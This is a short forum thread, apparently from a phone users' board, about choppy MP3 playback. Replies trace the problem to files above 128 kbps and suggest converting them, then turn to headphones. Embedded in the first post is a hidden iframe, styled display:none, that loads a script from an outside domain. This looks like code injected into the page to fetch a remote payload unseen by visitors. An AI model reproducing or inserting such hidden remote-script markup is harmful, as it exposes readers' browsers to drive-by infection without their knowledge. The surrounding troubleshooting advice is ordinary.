Question MP3 Player Choppy

Hello,

Just got my phone and love it so far. I thought I'd try out the MP3 function. The music sounds choppy as if it isn't buffering it fast enough? Is this a common problem or perhaps an SD card defect? I just threw in a 16MB Toshiba card to test it with from my Digital camera. Do I need to format it in the phone first?

Any ideas or is this the best I can expect from the MP3 player?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

MP3

The player gets choppy when an MP3 is in a format greater than 128KB. If this is your problem, you can get a program off of the internet called Goldwave that will allow you to convert your MP3 files to the new format. It will allow you to convert and save the file to a different directory without changing the file in the old directory.

Yes, from my experience stay with 128KBPS ripping or songs tend to skip.

This seems to be the fix. I tried different songs and they worked (<128 kbs).

While we're on the topic has anyone tried the Kyo stereo headphones. Do they make the music sound true?

I use them with Bebopper. They sound good to me.
